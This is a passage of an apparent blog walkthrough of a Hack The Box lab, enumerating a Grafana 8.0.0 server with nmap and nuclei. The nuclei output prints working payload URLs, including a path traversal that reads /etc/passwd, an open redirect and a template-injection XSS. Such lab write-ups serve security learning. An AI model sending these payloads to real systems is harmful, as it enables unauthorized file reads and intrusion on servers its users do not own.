https://substackcdn.com/image/fetch/$s_!OqHb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OqHb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png" width="725" height="535.6039325842696" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:526,&quot;width&quot;:712,&quot;resizeWidth&quot;:725,&quot;bytes&quot;:172280,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OqHb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 424w, https://substackcdn.com/image/fetch/$s_!OqHb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 848w, https://substackcdn.com/image/fetch/$s_!OqHb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 1272w, https://substackcdn.com/image/fetch/$s_!OqHb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB: -</em></p><p>Start with</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;bccc8261-d319-48bb-9646-620205739ed0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.234.47
PING 10.129.234.47 (10.129.234.47) 56(84) bytes of data.
64 bytes from 10.129.234.47: icmp_seq=1 ttl=63 time=401 ms
64 bytes from 10.129.234.47: icmp_seq=2 ttl=63 time=387 ms

--- 10.129.234.47 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 386.603/393.855/401.108/7.252 ms</code></pre></div><p>Continue with Nmap Scanning:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.234.47 -oA nmap/nmap                                               
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.234.47
Host is up (0.39s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p22,30000 -sC -sV 10.129.234.47 -oA nmap/nmap-port
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.234.47
Host is up (0.38s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
|   256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
|_  256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
30000/tcp closed ndmps
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>Looking at the port 3000 turns-out it&#8217;s the Web application based Grafana, maybe public CVE would do it.</p><ol start="2"><li><p><em>HTTP Service Enumeration</em></p></li></ol><p>So it&#8217;s on:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">http://10.129.234.47:3000/</code></pre></div><p>Let&#8217;s look at it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_jso!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_jso!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!_jso!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!_jso!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!_jso!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_jso!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:968837,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_jso!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!_jso!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!_jso!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!_jso!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7666af67-19a9-45fd-9c30-dcf77bb92553_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Yep, it&#8217;s Grafana based, and it tells us the version:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dcEm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dcEm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!dcEm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!dcEm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!dcEm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dcEm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png" width="1588" height="963" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/aee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:963,&quot;width&quot;:1588,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:969376,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ce999f9-005a-48b6-8055-c1cf01bba257_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dcEm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!dcEm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!dcEm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!dcEm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faee44d25-d0dd-44ae-a05a-86821ca45be9_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">v8.0.0</code></pre></div><p>Not really a Grafana guy but maybe it have CVE we can use.</p><ol start="3"><li><p><em>Grafana 8.0 CVE Enumeration</em></p></li></ol><p>Looking at Internet bunch of them says Path traversal:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z6vp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z6vp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 424w, https://substackcdn.com/image/fetch/$s_!Z6vp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 848w, https://substackcdn.com/image/fetch/$s_!Z6vp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 1272w, https://substackcdn.com/image/fetch/$s_!Z6vp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z6vp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png" width="1363" height="917" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:917,&quot;width&quot;:1363,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:128409,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Z6vp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 424w, https://substackcdn.com/image/fetch/$s_!Z6vp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 848w, https://substackcdn.com/image/fetch/$s_!Z6vp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 1272w, https://substackcdn.com/image/fetch/$s_!Z6vp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39a23c50-7823-46ba-9efc-29d0e063a85e_1363x917.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s use Nulclei for this.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ nuclei --target http://10.129.234.47:3000/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.1

                projectdiscovery.io

[INF] Your current nuclei-templates v10.4.0 are outdated. Latest is v10.4.1
. . .[SNIP]. . .
[INF] Templates clustered: 2260 (Reduced 2134 Requests)
[INF] Using Interactsh Server: oast.pro
[CVE-2025-4123:open-redirect] [http] [high] http://10.129.234.47:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..
[cookies-without-secure] [javascript] [info] 10.129.234.47:3000 ["redirect_to"]
[snmpv3-detect] [javascript] [info] 10.129.234.47:3000 ["Enterprise: unknown"]
[CVE-2021-43798] [http] [high] http://10.129.234.47:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
[robots-txt] [http] [info] http://10.129.234.47:3000/robots.txt
[prometheus-metrics] [http] [medium] http://10.129.234.47:3000/metrics
[fingerprinthub-web-fingerprints:grafana] [http] [info] http://10.129.234.47:3000/login
[grafana-metrics-exposure:version] [http] [low] http://10.129.234.47:3000/metrics ["8.0.0"]
[grafana-detect] [http] [info] http://10.129.234.47:3000/login ["8.0.0"]
[missing-cookie-samesite-strict] [http] [info] http://10.129.234.47:3000/ ["redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax"]
[CVE-2021-41174] [http] [medium] http://10.129.234.47:3000/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 ["v8.0.0"]
[http-missing-security-headers:content-security-policy] [http] [info] http://10.129.234.47:3000/login
[http-missing-security-headers:referrer-policy] [http] [info] http://10.129.234.47:3000/login
. . .[SNIP]. . .
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.129.234.47:3000/login
[xss-deprecated-header] [http] [info] http://10.129.234.47:3000/ ["1; mode=block"]</code></pre></div><p>So by nuclei it listed:</p><ul><li><p>CVE-2025-4123</p></li><li><p>CVE-2021-43798</p></li><li><p>CVE-2021-41174</p></li></ul><p>And looking at the PoC it&#8217;s like confirming the Path traversal. Looking at the &#8220;CVE-2021-43798&#8220; it&#8217;s says for Grafana:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AAS5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AAS5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 424w, https://substackcdn.com/image/fetch/$s_!AAS5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 848w, https://substackcdn.com/image/fetch/$s_!AAS5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 1272w, https://substackcdn.com/image/fetch/$s_!AAS5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AAS5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png" width="1397" height="915" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:915,&quot;width&quot;:1397,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:132786,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2602178-b0cd-440b-b405-fbf3f6792a20_1397x915.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!AAS5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 424w, https://substackcdn.com/image/fetch/$s_!AAS5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 848w, https://substackcdn.com/image/fetch/$s_!AAS5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5af7dabb-be05-4235-a8da-41d951ef60c0_1397x915.png 1272w, 